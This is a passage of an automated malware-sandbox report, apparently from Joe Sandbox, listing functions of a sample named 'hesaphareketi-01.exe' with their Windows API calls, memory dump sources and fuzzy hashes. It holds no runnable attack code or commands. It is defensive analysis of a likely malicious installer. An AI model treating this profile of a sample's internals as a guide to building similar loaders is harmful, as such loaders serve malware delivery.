                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 100022D0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                                                        • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1296135375.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1296082839.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1296189107.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1296242418.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                      • String ID:
                                                                                      • API String ID: 4216380887-0
                                                                                      • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                      • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                                                      • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                      • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                      • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1296135375.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1296082839.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1296189107.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1296242418.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                      • String ID:
                                                                                      • API String ID: 1148316912-0
                                                                                      • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                      • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                      • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                      • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                                                      • Instruction ID: face61d34558c4de7c2b3a6e9a6cb1e1a296a7661f17e088ac2b3614559d71e0
                                                                                      • Opcode Fuzzy Hash: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                                                      • Instruction Fuzzy Hash: 2DF0FF72604518AFDB01DBE4DF88CEEB7BCEB48341B14047AF641F6191CA749D019B78
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404AA2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(0042D248,0042D248,0000040F,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400), ref: 00404B43
                                                                                      • wsprintfW.USER32 ref: 00404B4C
                                                                                      • SetDlgItemTextW.USER32(00000000,0042D248), ref: 00404B5F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s
                                                                                      • API String ID: 3540041739-3551169577
                                                                                      • Opcode ID: 5f447e8c3e0c0d793aaaef53ecb87e13e88cece0c879eaec7e6436626da57f90
                                                                                      • Instruction ID: a69b8d9c405cb410f429d1b91b3aaf5cd8934f07bb3ea9cf38393447591b3b6c
                                                                                      • Opcode Fuzzy Hash: 5f447e8c3e0c0d793aaaef53ecb87e13e88cece0c879eaec7e6436626da57f90
                                                                                      • Instruction Fuzzy Hash: EA11EB736041283BDB00A66DDC42E9F369CDB81338F154237FA66F21D1D9B8D82146E8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405BFE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,75383420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75383420,00000000), ref: 00405C0C
                                                                                      • CharNextW.USER32(00000000), ref: 00405C11
                                                                                      • CharNextW.USER32(00000000), ref: 00405C29
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext
                                                                                      • String ID: C:\
                                                                                      • API String ID: 3213498283-3404278061
                                                                                      • Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                                                      • Instruction ID: 71472b9638db6d5cc2cef3a2d8db9d1c11fc55a0834b756b62a4f8b04705d027
                                                                                      • Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                                                      • Instruction Fuzzy Hash: B7F09662908F1555FF317A945C45ABB57B8DB54BA0B00C83BD602B72C0E3B85CC58E9A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405B53 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75383420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75383420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405B75
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B53
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2659869361-787714339
                                                                                      • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                                      • Instruction ID: 33d5b4b63083ad43afaa288e046e1f08ed21b79f7f5b9eb46acb358563388364
                                                                                      • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                                      • Instruction Fuzzy Hash: 86D05E31101924AAC121BB549C04DDF63ACAE86304342087AF541B20A5C77C296286FD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                                                      • GetTickCount.KERNEL32 ref: 00402E8E
                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                                                      • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                      • String ID:
                                                                                      • API String ID: 2102729457-0
                                                                                      • Opcode ID: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                                                      • Instruction ID: fb236cf74f4011b48551144809540ae7a3d608603197ef92b98d1837a73ee17d
                                                                                      • Opcode Fuzzy Hash: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                                                      • Instruction Fuzzy Hash: BDF05E30941620EBC6316B20FF0DA9B7B69BB44B42745497AF441B19E8C7B44881CBDC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040525A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 00405289
                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004052DA
                                                                                        • Part of subcall function 00404263: SendMessageW.USER32(0001046E,00000000,00000000,00000000), ref: 00404275
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3748168415-3916222277
                                                                                      • Opcode ID: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                                                      • Instruction ID: e35359e86d41fb5d6968ee62a371e6abd11f03428b82ac61abb391d392e116c6
                                                                                      • Opcode Fuzzy Hash: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                                                      • Instruction Fuzzy Hash: 0E017131510609ABDF209F51DD84A5B3A25EF84754F5000BBFA04751D1C77A9C929E6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004038FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75383420,004038D3,004036E9,00000006,?,00000006,00000008,0000000A), ref: 00403915
                                                                                      • GlobalFree.KERNEL32(?), ref: 0040391C
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040390D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$GlobalLibrary
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 1100898210-787714339
                                                                                      • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                      • Instruction ID: e66732d9f8c7dde22b06ec40e1a6716a7c13e86cf839674f34118547447e98ef
                                                                                      • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                      • Instruction Fuzzy Hash: 95E012739019209BC6215F55ED08B5E7B68AF58B22F05447AE9807B26087B45C929BD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405B9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\hesaphareketi-01.exe,C:\Users\user\Desktop\hesaphareketi-01.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BA5
                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\hesaphareketi-01.exe,C:\Users\user\Desktop\hesaphareketi-01.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BB5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrlen
                                                                                      • String ID: C:\Users\user\Desktop
                                                                                      • API String ID: 2709904686-3443045126
                                                                                      • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                      • Instruction ID: a8af4f0e04a9cb416ac945bb8770274a79718c16fb62e87aa8b604c5d62251ee
                                                                                      • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                      • Instruction Fuzzy Hash: D5D05EB24019209AD3126B08DC00DAF73A8EF5230074A48AAE841A6165D7B87D8186AC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1296135375.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1296082839.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1296189107.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1296242418.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                      • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                      • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                      • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405CD9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D01
                                                                                      • CharNextA.USER32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D12
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
